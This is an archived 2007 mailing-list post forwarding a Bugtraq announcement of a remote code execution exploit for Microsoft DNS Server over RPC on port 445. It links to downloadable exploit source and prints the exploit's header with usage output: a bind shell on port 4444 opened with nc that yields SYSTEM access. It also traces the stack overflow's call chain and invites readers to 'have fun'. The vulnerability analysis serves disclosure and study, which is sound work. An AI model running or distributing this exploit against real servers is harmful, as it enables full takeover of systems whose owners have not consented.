[dns-operations] Microsoft DNS Server Remote Code execution: Analysis and exploit (fwd)

Gadi Evron ge at linuxbox.org
Tue Apr 17 01:16:41 UTC 2007 

---------- Forwarded message ----------
Date: 16 Apr 2007 03:15:47 -0000
From: mballano at gmail.com
To: bugtraq at securityfocus.com
Subject: Microsoft DNS Server Remote Code execution: Analysis and exploit

Hi, 

Im sending you the headers of the new exploit code for microsoft DNS servers. You can download the full source code exploit and analysis at:

- http://www.514.es/Microsoft_Dns_Server_Exploit.zip
- http://www.48bits.com/exploits/dnsxpl.rar

/* Microsoft DNS Server Remote Code execution Exploit and analysis 
   Advisory: http://www.microsoft.com/technet/security/advisory/935964.mspx
   This remote exploit works against port 445 (also Microsoft RPC api used)

  Author:
  * Mario Ballano  ( mballano~gmail.com )  
  * Andres Tarasco ( atarasco~gmail.com )
   
  Timeline:
  * April,12,2007: Microsoft advisory published
  * April,13,2007: POC Exploit coded
  * April,14,2007: Microsoft notified about a new attack vector against port 445 (this exploit code)
  * April,14,2007: Working exploit for Windows 2000 server SP4 (Spanish)
  * April,15,2007: Working exploit for Windows 2003 server SP2 (Spanish) /GS bypassed
  * April,16,2007: hackers hax the w0rld and got busted.
  * April,xx,2007: Lammer release the first buggy worm
  * Xxxxx,xx,2007: Finally it was true. Nacked photos of Gary m.. being abducted were found at NSA servers
  
  
  Usage:
  D:\DNSTEST>dnstest.exe 192.168.1.7
    -------------------------------------------------------
    Microsoft Dns Server local & remote RPC Exploit code (port 445)
    Exploit code by Andres Tarasco & Mario Ballano
    Tested against Windows 2000 server SP4 and Windows 2003 SP2 (Spanish)
    -------------------------------------------------------

   [+] Trying to fingerprint target.. 05 02
   [+] Remote Host identified as Windows 2003
   [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076 at ncacn_np:192.168.1.7[\\pipe\\dnsserver]
   [+] RpcBindingFromStringBinding returned 0x0
   [+] Calling remote procedure DnssrvOperation()
   [+] Now try to connect to port 4444

  D:\DNSTEST>nc 192.168.1.7 4444
   Microsoft Windows [Version 5.2.3790]
   (C) Copyright 1985-2003 Microsoft Corp.

   C:\WINDOWS\system32>whoami
   nt authority\system  

  Vulnerability Analysis:

  The function Lookup_ZoneTreeNodeFromDottedName() uses a fixed local buffer to convert
  a string calling Name_ConvertFileNameToCountName(), this string can contain back-slash 
  octal characters. Although some bounds checks are done when writting to the buffer is 
  still possible to bypass them using a string with multiple backslashed chars, resulting
  in a stack based buffer overflow.

  This function can be reached through DNS RPC Interface, the execution flow 
  will be as follows:

  R_DnssrvQuery(pa,buggybuffer,pc,DesiredAccess,pd);                  // RPC Exported function
  R_DnssrvQuery2(0,0,pa,buggybuffer,pc,DesiredAccess,pd);      
  RpcUtil_FindZone(buggybuffer,1,DesiredAccess);  
  Zone_FindZoneByName(buggybuffer);                                   // Here we go!
  Lookup_ZoneTreeNodeFromDottedName(buggybuffer,0,0x2000000);
	  	  Name_ConvertFileNameToCountName(localbuffer,buggybuffer,0); // Using fixed size local buffer
					extractQuotedChar(x,x,buggybuffer);               // Extract octal number  	     
  Disassemblies at the end of the code:

  References:
  - Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server. (David Litchfield, NGSSoftware).
  - www.48bits.com
  - http://www.514.es

  Just compile the code with nmake and have fun!


*/

More information about the dns-operations mailing list